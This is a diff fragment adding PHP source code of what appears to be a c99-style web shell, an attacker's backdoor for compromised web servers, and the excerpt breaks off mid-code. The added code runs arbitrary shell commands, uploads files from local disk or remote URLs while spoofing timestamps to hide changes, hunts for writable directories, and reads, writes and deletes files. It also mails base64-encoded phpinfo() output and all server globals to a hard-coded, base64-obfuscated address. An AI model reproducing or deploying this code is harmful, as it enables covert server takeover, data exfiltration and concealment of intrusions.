+    echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
+  }
+}
+if ($act == "feedback") {
+  $suppmail = base64_decode("ZmVlbGNvbXpAZ21haWwuY29t");
+  if (!empty($submit)){
+    $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+    $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+    if (!empty($fdbk_ref)) {
+      $tmp = @ob_get_contents();
+      ob_clean();
+      phpinfo();
+      $phpinfo = base64_encode(ob_get_contents());
+      ob_clean();
+      echo $tmp;
+      $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+    }
+    mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
+    echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=feedback>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
+         "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
+         "*Language: English, Indonesian.</td></tr>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>";
+  }
+}
+if ($act == "fxmailer") {
+  if (!empty($submit)){
+    $headers = 'To: '.$dest_email."\r\n";
+    $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
+    if (mail($suppmail,$sender_subj,$sender_body,$header)) {
+      echo "<center><b>Email sent!</b></center>";
+    }
+    else { echo "<center><b>Couldn't send email!</b></center>"; }
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=fxmailer>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: $sh_name Mailer :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
+         "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
+         "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>";
+  }
+}
+if ($act == "search") {
+  echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
+  if (empty($search_in)) {$search_in = $d;}
+  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+  if (!empty($submit)) {
+    $found = array();
+    $found_d = 0;
+    $found_f = 0;
+    $search_i_f = 0;
+    $search_i_d = 0;
+    $a = array(
+        "name"=>$search_name,
+        "name_regexp"=>$search_name_regexp,
+        "text"=>$search_text,
+        "text_regexp"=>$search_text_regxp,
+        "text_wwo"=>$search_text_wwo,
+        "text_cs"=>$search_text_cs,
+        "text_not"=>$search_text_not
+    );
+    $searchtime = getmicrotime();
+    $in = array_unique(explode(";",$search_in));
+    foreach($in as $v) {c99fsearch($v);}
+    $searchtime = round(getmicrotime()-$searchtime,4);
+    if (count($found) == 0) {echo "No files found!";}
+    else {
+      $ls_arr = $found;
+      $disp_fullpath = TRUE;
+      $act = "ls";
+    }
+  }
+  echo "<table class=contents>".
+       "<tr><td><form method=POST>".
+       "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
+       "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
+       "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
+       "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
+       "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
+       "  <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
+       "  <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
+       "  <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
+       "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
+       "</table>";
+  if ($act == "ls") {
+    $dspact = $act;
+    echo "Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
+         "<hr size=\"1\" noshade>";
+  }
+}
+if ($act == "chmod") {
+  $mode = fileperms($d.$f);
+  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+  else {
+    $form = TRUE;
+    if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+}
+}
+if ($act == "upload") {
+  $uploadmess = "";
+  $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+  if (empty($uploadpath)) {$uploadpath = $d;}
+  elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
+  if (!empty($submit)) {
+    global $_FILES;
+    $uploadfile = $_FILES["uploadfile"];
+    if (!empty($uploadfile["tmp_name"])) {
+      if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+      else {$destin = $userfilename;}
+      if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
+        $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
+      }
+      else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
+    }
+    elseif (!empty($uploadurl)) {
+      if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+      else {
+        $destin = explode("/",$destin);
+        $destin = $destin[count($destin)-1];
+        if (empty($destin)) {
+          $i = 0;
+          $b = "";
+          while(file_exists($uploadpath.$destin)) {
+            if ($i > 0) {$b = "_".$i;}
+            $destin = "upload".$b;
+            $i++;
+          }
+        }
+      }
+      if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorrect URL!</b>";}
+      else {
+        $st = getmicrotime();
+        $content = @file_get_contents($uploadurl);
+        $dt = round(getmicrotime()-$st,4);
+        if (!$content) {$uploadmess .=  "Can't download file!";}
+        else {
+          if ($filestealth) {$stat = stat($uploadpath.$destin);}
+          $fp = fopen($uploadpath.$destin,"w");
+          if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+          else {
+            fwrite($fp,$content,strlen($content));
+            fclose($fp);
+            if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+            $uploadmess .= "File saved from ".$uploadurl." !";
+          }
+        }
+      }
+    }
+    else { echo "No file to upload!"; }
+  }
+  if ($miniform) {
+    echo "<b>".$uploadmess."</b>";
+    $act = "ls";
+  }
+  else {
+    echo "<table><tr><td colspan=2 class=barheader>".
+         ".: File Upload :.</td>".
+         "<td colspan=2>".$uploadmess."</td></tr>".
+         "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
+         "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
+         "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
+         "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
+         "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
+         "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
+         "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
+         "</form></td></tr></table>";
+  }
+}
+if ($act == "delete") {
+  $delerr = "";
+  foreach ($actbox as $v) {
+    $result = FALSE;
+    $result = fs_rmobj($v);
+    if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  }
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+  $act = "ls";
+}
+if (!$usefsbuff) {
+  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";}
+}
+else {
+  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+  elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+  elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    c99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+    $act = "ls";
+  }
+  elseif ($actarcbuff) {
+    $arcerr = "";
+    if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+    else {$ext = ".tar.gz";}
+    if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+    $cmdline .= " ".$actarcbuff_path;
+    $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+    foreach($objects as $v) {
+      $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+      if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+      if (is_dir($v)) {
+        if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+        $v .= "*";
+      }
+      $cmdline .= " ".$v;
+    }
+    $tmp = realpath(".");
+    chdir($d);
+    $ret = myshellexec($cmdline);
+    chdir($tmp);
+    if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+    $ret = str_replace("\r\n","\n",$ret);
+    $ret = explode("\n",$ret);
+    if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+    foreach($sess_data["cut"] as $k=>$v) {
+      if (in_array($v,$ret)) {fs_rmobj($v);}
+      unset($sess_data["cut"][$k]);
+    }
+    c99_sess_put($sess_data);
+    if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+    $act = "ls";
+  }
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    c99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+    $act = "ls";
+  }
+}
+if ($act == "cmd") {
+  @chdir($chdir);
+  if (!empty($submit)) {
+    echo "<div class=barheader>.: Result of Command Execution :.</div>";
+    $olddir = realpath(".");
+    @chdir($d);
+    $ret = myshellexec($cmd);
+    $ret = convert_cyr_string($ret,"d","w");
+    if ($cmd_txt) {
+      $rows = count(explode("\r\n",$ret))+1;
+      if ($rows < 10) {$rows = 10; }
+      if ($msie) { $cols = 113; }
+      else { $cols = 117;}
+      //echo "<textarea cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>";
+      echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
+    }
+    else {echo $ret."<br>";}
+    @chdir($olddir);
+  }
+  else {
+    echo "<b>Command Execution</b>";
+    if (empty($cmd_txt)) {$cmd_txt = TRUE;}
+  }
+}
+if ($act == "ls") {
+  if (count($ls_arr) > 0) { $list = $ls_arr; }
+  else {
+    $list = array();
+    if ($h = @opendir($d)) {
+      while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+      closedir($h);
+    }
+  }
+  if (count($list) == 0) { echo "<div class=fxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
+  else {
+    $objects = array();
+    $vd = "f"; //Viewing mode
+    if ($vd == "f") {
+      $objects["head"] = array();
+      $objects["folders"] = array();
+      $objects["links"] = array();
+      $objects["files"] = array();
+      foreach ($list as $v) {
+        $o = basename($v);
+        $row = array();
+        if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
+        elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
+        elseif (is_dir($v)) {
+          if (is_link($v)) {$type = "LINK";}
+          else {$type = "DIR";}
+          $row[] = $v;
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+        $row[] = filemtime($v);
+        if (!$win) {
+          $ow = posix_getpwuid(fileowner($v));
+          $gr = posix_getgrgid(filegroup($v));
+          $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+        }
+        $row[] = fileperms($v);
+        if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+        elseif (is_link($v)) {$objects["links"][] = $row;}
+        elseif (is_dir($v)) {$objects["folders"][] = $row;}
+        elseif (is_file($v)) {$objects["files"][] = $row;}
+        $i++;
+      }
+      $row = array();
+      $row[] = "<b>Name</b>";
+      $row[] = "<b>Size</b>";
+      $row[] = "<b>Date Modified</b>";
+      if (!$win) {$row[] = "<b>Owner/Group</b>";}
+      $row[] = "<b>Perms</b>";
+      $row[] = "<b>Action</b>";
+      $parsesort = parsesort($sort);
+      $sort = $parsesort[0].$parsesort[1];
+      $k = $parsesort[0];
+      if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+      $y = " <a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+      $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+      $row[$k] .= $y;
+      for($i=0;$i<count($row)-1;$i++) {
+        if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+      }
+      $v = $parsesort[0];
+      usort($objects["folders"], "tabsort");
+      usort($objects["links"], "tabsort");
+      usort($objects["files"], "tabsort");
+      if ($parsesort[1] == "d") {
+        $objects["folders"] = array_reverse($objects["folders"]);
+        $objects["files"] = array_reverse($objects["files"]);
+      }
+      $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+      $tab = array();
+      $tab["cols"] = array($row);
+      $tab["head"] = array();
+      $tab["folders"] = array();
+      $tab["links"] = array();
+      $tab["files"] = array();
+      $i = 0;
+      foreach ($objects as $a) {
+        $v = $a[0];
+        $o = basename($v);
+        $dir = dirname($v);
+        if ($disp_fullpath) {$disppath = $v;}
+        else {$disppath = $o;}
+        $disppath = str2mini($disppath,60);
+        if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+        elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+        foreach ($regxp_highlight as $r) {
+          if (ereg($r[0],$o)) {
+            if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+            else {
+              $r[1] = round($r[1]);
+              $isdir = is_dir($v);
+              if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
+                if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+                $disppath = $r[2].$disppath.$r[3];
+                if ($r[4]) {break;}
+              }
+            }
+          }
+        }
+        $uo = urlencode($o);
+        $ud = urlencode($dir);
+        $uv = urlencode($v);
+        $row = array();
+        if ($o == ".") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "CURDIR";
+        }
+        elseif ($o == "..") {
+          $row[] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
+          $row[] = "UPDIR";
+        }
+        elseif (is_dir($v)) {
+          if (is_link($v)) {
+            $disppath .= " => ".readlink($v);
+            $type = "LINK";
+            $row[] = "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          else {
+            $type = "DIR";
+            $row[] =  "<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."act=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
+          }
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {
+          $ext = explode(".",$o);
+          $c = count($ext)-1;
+          $ext = $ext[$c];
+          $ext = strtolower($ext);
+          $row[] =  "<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
+          $row[] = view_size($a[1]);
+        }
+        $row[] = date("d.m.Y H:i:s",$a[2]);
+        if (!$win) {$row[] = $a[3];}
+        $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+        if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+        else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+        if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
+        else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
+        if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+        elseif (is_link($v)) {$tab["links"][] = $row;}
+        elseif (is_dir($v)) {$tab["folders"][] = $row;}
+        elseif (is_file($v)) {$tab["files"][] = $row;}
+        $i++;
+      }
+    }
+    // Compiling table
+    $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+    echo "<div class=barheader>.: ";
+    if (!empty($fx_infohead)) { echo $fx_infohead; }
+    else { echo "Directory List (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
+    echo " :.</div>\n";
+    echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
+         "<table class=explorer>";
+    foreach($table as $row) {
+      echo "<tr>";
+      foreach($row as $v) {echo "<td>".$v."</td>";}
+      echo "</tr>\r\n";
+    }
+    echo "</table>".
+         "<script>".
+         "function ls_setcheckboxall(status) {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
+         "}".
+         "function ls_reverse_all() {".
+         " var id = 1; var num = ".(count($table)-2).";".
+         " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
+         "}".
+         "</script>".
+         "<div align=\"right\">".
+         "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
+         "<img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+    if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
+      echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tgz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+    echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+    echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+    if ($usefsbuff) {
+      echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+      echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+      echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+    }
+    echo "</select>&nbsp;<input type=submit value=\"Confirm\"></div>";
+    echo "</form>";
+  }
+}
+if ($act == "tools") //Define Yourself
+{
+
+}
+if ($act == "phpfsys") {
+  echo "<div align=left>";
+  $fsfunc = $phpfsysfunc;
+  if ($fsfunc=="copy") {
+    if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
+    else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
+  }
+  elseif ($fsfunc=="rename") {
+    if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
+    else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
+  }
+  elseif ($fsfunc=="chmod") {
+    if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
+    else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
+  }
+  elseif ($fsfunc=="read") {
+    $hasil = @file_get_contents($arg1);
+    echo "<b>Filename:</b> $arg1<br>";
+    echo "<textarea cols=150 rows=20>";
+    echo $hasil;
+    echo "</textarea>\n";
+  }
+  elseif ($fsfunc=="write") {
+    if(@file_put_contents($d.$arg1,$arg2)) {
+      echo "<b>Saved!</b> ".$d.$arg1;
+    }
+    else { echo "<div class=fxerrmsg>Couldn't write to $arg1!</div>"; }
+  }
+  elseif ($fsfunc=="downloadbin") {
+    $handle = fopen($arg1, "rb");
+    $contents = '';
+    while (!feof($handle)) {
+      $contents .= fread($handle, 8192);
+    }
+    $r = @fopen($d.$arg2,'w');
+    if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+    else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
+    fclose($r);
+    fclose($handle);
+  }
+  elseif ($fsfunc=="download") {
+    $text = implode('', file($arg1));
+    if ($text) {
+      $r = @fopen($d.$arg2,'w');
+      if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
+      else { echo "<div class=fxerrmsg>Couldn't write to ".$d.$arg2."!</div>"; }
+      fclose($r);
+    }
+    else { echo "<div class=fxerrmsg>Couldn't download from $arg1!</div>";}
+  }
+  elseif ($fsfunc=='mkdir') {
+    $thedir = $d.$arg1;
+    if ($thedir != $d) {
+      if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
+      elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
+      else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
+    }
+    else { echo "Couldn't create current dir:<b> $thedir</b>"; }
+  }
+  elseif ($fsfunc=='fwritabledir') {
+    function recurse_dir($dir,$max_dir) {
+      global $dir_count;
+      $dir_count++;
+      if( $cdir = @dir($dir) ) {
+        while( $entry = $cdir-> read() ) {
+          if( $entry != '.' && $entry != '..' ) {
+            if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
+             if ($dir_count > $max_dir) { return; }
+              echo "[".$dir_count."] ".$dir.$entry."\n";
+              recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
+            }
+          }
+        }
+        $cdir->close();
+      }
+    }
+    if (!$arg1) { $arg1 = $d; }
+    if (!$arg2) { $arg2 = 10; }
+    echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<br>";
+    echo "<pre>";
+    recurse_dir($arg1,$arg2);
+    echo "</pre>";
+    $total = $dir_count - 1;
+    echo "<b>Founds:</b> ".$total." of <b>Max</b> $arg2";
+  }
+  else {
+    if (!$arg1) { echo "<div class=fxerrmsg>No operation! Please fill parameter [A]!</div>\n"; }
+    else {
+      if ($hasil = $fsfunc($arg1)) {
+        echo "<b>Result of $fsfunc $arg1:</b><br>";
